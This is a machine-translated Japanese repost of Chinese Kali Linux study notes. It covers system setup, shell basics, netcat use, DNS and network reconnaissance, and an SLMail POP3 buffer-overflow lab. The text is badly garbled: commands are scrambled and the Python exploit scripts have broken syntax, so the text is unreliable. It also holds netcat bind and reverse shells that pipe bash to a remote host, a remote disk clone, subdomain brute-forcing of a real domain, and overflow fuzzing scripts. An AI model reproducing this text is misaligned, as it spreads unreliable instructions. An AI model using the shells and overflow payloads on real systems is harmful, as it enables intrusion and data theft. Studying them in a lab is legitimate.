その研究ノートkalilinux問題

A:カーリーインストール
ルートとして実行するようにsudoの追加コマンドを
-h今、シャットダウン、再起動、再起動、シャットダウン
1.ユーザーの変更
passwdのルート須藤:最初のステップ
。ステップ2を:確認に古いパスワード(カーリー)を入力します
ステップ3:その後、新しいパスワードを入力し、最後に、それは、確認の再起動、再起動を入力したい
ルート+パスワードでログオン
ルート管理(rootアカウント):アカウント1:カーリーカーリー(一般会計)2を占める
ソースおよび更新のために2
入力/ sources.listのvimの1.vimの/ etc / aptのソースエディタに追加
あなたはWQと権限の問題を保存する場合2.を!保存し
た入力ソースの後にトランスデューサ3:apt-getを更新&& APT- GET && apt-getのクリーンアップグレードとアップデートソフトウェアのアップデート元
3.ローカライズ
1に入力し、端末のxfonts-intl-インストールapt-getの中国のttf-WQY-microhei 取り付け中国語フォント(フォントは、ソース交換後にダウンロードすることができる)
2.(タブ*とのハンドオーバが選択されるボックス選択、)グラフィカル・インターフェースに符号化形式のdpkg-再構成ロケール(rootユーザ)を交換した後、zh_CN.UTF-8を選択デフォルトとしてzh_CN.UTF-8を決定した後。
3.ターミナルを入力します。再起動がzh_CN.utf8にするかどうかをシステム、上側の注意を払うにおけるログイン画面の言語のリストを再起動し、中国のために選択し決定するために、リストを開く-中国(変更の一部、表示された場合は、再起動、多くの問題を解決することができます)
4インプットメソッドをインストール
更新-GET 1.apt
2.apt-GETはfcitxインストール
3.apt-GET-インストールfcitx Googleピン音入力を
再起動し、新しい入力方式、オリジナルと同じように構成することがもはや必要があるだろう、右上隅をクリックして、あなたは入力方式を切り替えることができますまた、独自のショートカットを設定することができます。
クイックスタート端子が設定されている
2020.1で、そこのgnome-terminalコマンドでターミナルを起動していない。
今取るターミナル、起動するxfce4-コマンドで
設定で見つかった---- ---- >>キーボードの[追加]を、XFCE4を入力します。末端

ドキュメントの参照します。https://blog.csdn.net/Jack0610/article/details/103931466 depth_1-は、utm_source = distribute.pc_relevant.noneタスク&は、utm_source = distribute.pc_relevant.noneタスク?

II:環境に慣れ
bashのコマンドに精通1.
LS:リスト現在のディレクトリは次のディレクトリに勝つと等価である
bshel​​lデフォルトの下カーリーの使用を:
白のために実行可能ファイルの通常のファイル・ディレクトリを表し、青、緑、圧縮ファイル赤
、長いファイルに表示-lを最初の列は、最初の文字dはデバイスファイルのディレクトリC Lが接続されている表し示し- bがファイルを表す表現速い
-a隠しファイルを表示
、表示、読みやすい-h
サイズによってソートソート-sort =時間=サイズを
CD:ディレクトリに同じ勝利でCD
現在のディレクトリにコピーします。
...親ディレクトリにカレントディレクトリ
PWD:表示現在の作業ディレクトリ〜はユーザーのホームディレクトリ(ルートディレクトリ)を示している
CAT /パスを:表示するテキストタイプのすべての内容
より/パス:現在のウィンドウ表示ファイルの内容に応じて、一つだけ、スクリーン・バイビュー
レス/パス:似たほかの
尾/パス:デフォルト表示ファイルの最後の10行-行数は、
-n numberコマンドを見る:背後秒のない数は、コマンドを実行しない
のrmファイル名:ファイルを削除
-r:ディレクトリの削除
CPファイルを新しい名前を[ファイル名]:ファイルをコピーする
-r:ディレクトリ/コピー
PIDを:プロセスが表示
プロセスをkill:プロセスを殺す
Qを:pidの終了
PSを:プロセスを表示します
- EF
AUX
グレップ:フィルタの出力内容強化されたバージョンeqrepの
ifconfigコマンドカードのアップ/ダウン:カードのオン/オフ
を表示し、アドレスローカルで生成されたTCP、UDP接続:-pantu netstatの
例:netstatの-pantu | egrepの-v '0.0.0.0 | :::' |のawk '{} 5プリント$。' | egrepの-v 'と|住所'
|カットが-d ':' 1 -f |並べ替え| uniqの> IPの。
注:| awkを切り捨てコラムパイプカットを撮影:最初のソート番号のソート後uniqの出力
ルート
マウント:マウントするマウント・ファイルのディレクトリ
指定したディレクトリにISOファイルをマウントする.ISO /ディレクトリ-oループファイル名を
dmesgの:同様の機能と尾、デフォルトのディレクトリ
検索:ファイルのディレクトリを検索するには
、ファイル名/プレゼンテーションを見つける-nameルートディレクトリには、
類似したファイル名のディレクトリを見つける-iname
ワイルドカード*
whereisは:同じ機能、より少ない結果、速く、パッケージ管理領域の表情見つけるために
-bファイル名を:バイナリが見つけ
書き込みコマンドが表示する:エコー
基本的な操作2.vimテキストエディタを
テキストエディタやviにvimのファイル名:Vimを入力します。
エディタ:プレスは、私が建て
終了:1 [esc]キーを押し内蔵
:2 + Shiftキー
Qを保存せずに終了しWQ:3.保存して終了を!WQを保存して終了することを余儀なく!
私が編集モードに入ります
ESCコマンドモードに戻るに
削除するにはddコマンドラインモード
コマンドモードが挿入され、Oライン
をコピーするには、y-ラインコマンドモードを
P-lineコマンドモードはペースト
の追加
3.コンジット
パイプ文字:
|:垂直フロントのコマンド文字を入力としてコマンドの後に
& :約2は、実装が続く
&&:間違いの実装前後は、背後にあるコマンドの実行が成功に行われていない場合は
||を:実行エラーが、フロントの後ろに行われるバックコマンドが正常に実行されていない場合は
4.Shellスクリプトを
#!binに/ bashのラインは、ファイルの先頭を示し、文書には、道を説明
カーリー作業環境の最適化:3
1.ネットワーク構成
の一時的なIPアドレス(再起動の失敗)
自動的にアドレスをIP取得:のdhclientはeth0を
指定したIPアドレス:ifconfigコマンドeth0のIP
ルートの追加デフォルトでgwゲートウェイIP:指定ゲートウェイ
エコーネームサーバのIPアドレス>は/ etc /resolv.conf:変更DNSアドレス
固定IPアドレス
猫の/ etc /ネットワーク/インタフェースカードプロファイルの
アドレス:IPアドレスの
ネットマスク:サブネットマスク、
ゲートウェイ:ゲートウェイ
ネットワーク:ネットワークアドレス
、ブロードキャスト:ブロードキャストアドレス
、DNS-ネームサーバ:DNSアドレス
2.環境設定
4:基本的なツール
1.netcat
Base64のコマンド:base64では、コンテンツCRTL + Dをエンコード
のtelnet機能を実現
-vを:ショーは、コンテンツの詳細
-n IPアドレスポートを:ドメイン名が解決され
、送信テキスト情報に
ポートを開くことを特徴と必要性、クライアントとして他の接続先の
ホストポートB NC -nv IPのホストA :: NC -l -pポート
-lオープンリスニングポートとポート番号は-p指定
| grepを333 netstatの-pantu
実行した後:-q numbert終了数秒後

出力<入力
転送ディレクトリ
終了を送信します。tar -cvf -ディレクトリ| 1 -q NC -lpポート
端部を受ける:NC -nv IPアドレスポート|タール-xvf -
転送暗号化ファイル
A:NC -lp 333 | mcryptの--flush - -a -m Rijndaelの256-Fbqd ECB> 1.mp4の
B:mcryptの--flush -Fbqラインダール-a -m ECB-256 <a.mp4 | Q NC-333 1.1.1.1 1つの-nv。
ストリーミングサービス
A:猫1.mp4 | NC -lp 333
B:NC -nv 1.1.1.1 333 | mplayerの-vo x11の-cache 3000-
ポートスキャン
-z:スキャンポート
-u:プローブUDPポート
NC -nvz IPアドレス1〜65535
NC -nvzu IPアドレス1から1024
クローンをリモートハード
A:| NC -lp 333 =は/ dev / SDAのDD
Bます。dd if = / devの/ SDA | -q 1 333 NC -nv 1.1.1.1。
DD:ハードコピー・コマンド・ブロック・レベル
であれば:INPUTFILE
リモートコントロール
フォワード:
A:bashの-C(ホスト)-lp NC 333
、NC 333 -nv 1.1.1.1:B
リバース:
A:NC -lp 333
B:333 NC -nv 1.1.1.1バッシュ-C(ホスト)
NC意志bashがcmdをインストールするWindowsユーザ
シェルの他端に伝達-C bashの
53ポート:DNSを
NC-NCAT暗号化を離れて制御
認証および暗号化機能のNC欠如
NMAP NCAT含までキット
A:-C NCATバッシュ-ALLOW 192.168.43.182 -vnl 333 --ssl
B:NCAT -nv 192.168.43.100 --ssl
異なるシステム/プラットフォームパラメータNC機能します異なる2.wireshark
Etherealのスニファ、プロトコルアナライザ
のEtherealエンジン:libpcapの-LinuxのWinPcapの窓

3.tcpdump
5:受動的な情報収集
情報収集:
のFQDN:完全修飾ドメイン名
の再帰クエリを繰り返しクエリ
ドメインレコード:レコードの逆引きDNSのメール交換レコードMX PTRホストのCNAMEエイリアスレコード
nslookupを
DNS情報収集
DIG
+ + NOALL答え
-xアンチ問い合わせへの
情報のバインドバージョン:TXT混沌vERSION.BIND @ ns.sina.com
追跡:+トレース
ゾーン転送:DIG @ example.com ns1.example.com
ホスト-T -l sina.com ns3.sina.com
Viewコマンドマニュアル:
男の
情報
-help -H
DNSフィールドブラスト
激しい-dnsserver 8.8.8.8 -dns sina.com.cn -wordlist A.TXT
dnsdict6 -X-16-D4 -t sina.com
dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 -o sina.xml sina.com
dnsmap sina.com -w dns.txt
dnsreson -t 10 -d sina.com --lifetime BRT -D dnsbig.txt
-t -d sina.com STD dnsreson
DNS登録情報
WHOIS
WHOIS -h whois.apnic.net 192.0.43.10
検索エンジン
初段
NET


ポート
OS
のホスト名ホストまたはドメイン名
サーバー
Googleの
偵察-ngの
六:アクティブ情報収集
1.が見つかりました。
2を層の発見
ARPメッセージ
1.1.1.1 -C 1 ARPメッセージ
異なる検査のMACのARP欺瞞とARPメッセージ1.1.1.1 -dチェック腹腔

nmapの
NAMP 192.168.1.1/24 -sn

netdiscover
主动:
netdiscover -i eth0の-r 1.1.1.0/24
netdiscover -i iplist.txt
被动:
netdiscover -p

Scapy
APT-GET-インストールのpython3 gnuplotの
関数名は大文字でなければなりません()
SR1()契約

三つのが見つかりました
ICMPプロトコル
のtraceroute
のping -r
hping3
4つの見つかった
ホスト検出
Scapyの
-sn nmapののIPアドレス-puポート
ACKは、nmapのIPアドレス-paポート-sn見つける
hping3
7を:エクスプロイト
nmapの
カーリー@ルートをします。/ usr /このコンテンツ共有/ nmapのを報告します/スクリプト#script.db CAT | WC -l
SMB-vuln-ms10-061.nse
共有プリンタの脆弱性
nmapの-p445-スクリプト= smb-列挙-shares.nse-スクリプト引数= smbuser =管理者、smbpassword = pass1.1.1 0.1
脆弱性スキャナ
openvas
Nessusのプロジェクトの分岐
インストールopenvas
APT-GETインストールopenvasは
openvasインストールを設定
openvas-セットアップ
チェック
openvasチェックセットアップ
ビュー経常
openvasmdリストユーザー
アカウントのパスワードを変更します
openvasmdユーザー=管理者、新規作成パスワード=パスワード
openvasアップグレード
openvas-フィードの更新は、
サービスopenvas開始
openvasスタート
Nessusの
ダウンロードに
インストール:
dpkgの-iの
インストールパスをします。/ opt / Nessusの
サービスを開始します。
/etc/init.d/nessusdをスタート

八:オーバーフローバッファ
Windowsの
netstatコマンドは、どちらも内部も外部コマンドで
設定環境変数は、任意のパスにアクセスすることができた場合、環境変数を設定されていないことは、このコマンドへの電流経路のアクセス・パスが配置されているではないかもしれません。
;「%SYSTEMROOT%\ SYSTEM32追加し、システム変数、Path変数を設定します
(再オープンすることを確認し、それ以外の場合は効果がありません)CMDコマンドウィンドウを再オープン
のnetstat -ano
Fuzzer
XPクライアントソフトウェア
slmail5.5のmona.pyイミュニティデバッガ
XPエンド
ファイアウォールをPOP3 110 smtp25、:ポート例外設定
ICMPエコー要求が開き
カーリー端試験
NC 110 192.168.43.147、192.168.43.147 NC 25
コマンドバッファオーバーフローが通過存在POP3
セキュリティメカニズム上win7のを:
DEP:停止コードは、データページから実行される
ASLR :ランダムなメモリアドレスと実行プログラムロードDLLは、各再開アドレス変更
EIPレジスタは次の命令のアドレスを保持
ファジングPYスクリプトの
アイデア:メモリアドレス、シェルコードへの書き込みアドレス空間のシェルコードを変更するEIPを、プログラムは、EIPレジスタの読み込み値は、コード・セグメント・シェルコードにジャンプして実行
カリは、実行可能ファイルのプロパティ変更のアクセス許可を保存した後、PythonのVIMスクリプトエディタやマウスパッドで使用することができます
2.py
!#の/ usr /ビン/ Pythonの
インポートソケット
バッファ= [「A」]
カウンタ= 100
(バッファ)<= 50でlenつつ:
buffer.append(「B」*カウンタ)
カウンタ=カウント+ 200
で文字列を緩衝液:
プリント%でlen(文字列)、「ファジングパス%Sバイトで」
S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM)
接続= s.connect(( '192.168.43.147'、110))
s.recv( 1024)
s.send( 'ユーザテスト' + '\ R \ n')
s.recv(1024)
s.send( '通過'+文字列+' \ R \ n')
s.send( '\終了R \ nは「)
S。CLOSE()
图片:https://uploader.shimo.im/f/vceG0VHfpUYnjcPJ.png
图片:https://uploader.shimo.im/f/AIKerQJcHd8s7i22.png
3.py
!#は/ usr / binに/ Pythonの
インポートソケット
S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM)
= 'A' * 2700バッファ
試み:
プリント「\ nSendingの悪バッファ...」
s.connect(( '192.168.43.147'、110))
日付= s.recvを(1024)
s.send( 'ユーザテスト' + '\ R \ n')
データ= s.recv(1024)
s.send( '通過'+バッファ+' \ R \ n')
プリント「\ nDone!」
除く:
プリントは、「POP3に接続できませんでした」

見つかった4バイトのオーバーフロー正確な
二分法の
4.pyの
RBスクリプト
一意の文字列方法:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

#!は/ usrは/ binに/のpythonの
輸入ソケットは
、(はsocket.AF_INET、socket.SOCK_STREAM)、= socket.socketのS-
バッファ=」Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 "

試し:
印刷"\ nSending悪バッファ..."
s.connect(( '192.168.43.147'、110))
DATE = s.recv(1024)
s.send( 'ユーザーテスト' + '\ R&LT \ N-')
データ= s.recv(1024)
s.send( 'パス' +バッファ+ '\ rは\ N-')
印刷"\ nDone!。"
を除く:
印刷"できませんでし接続POP3への"
絵:https://uploader.shimo.im /f/dcoqQfQP0sImNj4f.png
39694438下降
進数38 44 69 39 = ASCII 8di9

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

対応するオフセット算出
https://uploader.shimo.im/f/i5iBJYnztiUcs8sf.png:画像
5.py
に配置されたESCのシェルコード
Pythonスクリプト:緩衝液= 'A' * 2606 + 'B'を。4 + 'C'(3500-2606-4)
シェルコード十分ESPレジスタ416の大きさを計算する
7.pyが悪い文字判断
異なるプログラムの種類、プロトコル、バグを、いくつかの文字が固定使用悪い文字であると考える
と、リターンアドレスをシェルコードを、悪い文字は表示されませバッファー
NULLバイト($ 00)は、文字列のコピー操作を終了するヌル文字
リターン(0x0Dを)キャリッジリターンを、コマンド入力がpop3pass表し
、すべての不正な文字を見つけ、0x00-0xff256文字を送信する:アイデアを

badchars = 0から256(16進数に対応する)
0A 0Dタブキーラップ00ヌル値

データストリームがリダイレクト
ESP EIPのアドレス値に置き換えられる
が、ESPランダムに生成されたアドレスの変更、ハード復号可能
slmailはアプリケーション、各スレッドに割り当てられたアドレス範囲のオペレーティングシステムのスレッドは、各スレッドのアドレス範囲不明

仕事を考える
メモリモジュールシステム内の固定のアドレスを見つけるために
命令アドレスが、それによってシェルコードの実行、その後、モジュールにESPからの指示に間接ジャンプをジャンプESP探してJMPを
mona.pyスクリプト識別メモリモジュールを、「戻りアドレス」を検索これは、ESP JMPです

後でpython2.7かを使用する必要がmona.py

リリース7件のオリジナルの記事 ウォンの賞賛0 ビュー82

おすすめ

転載: blog.csdn.net/q20010619/article/details/104777224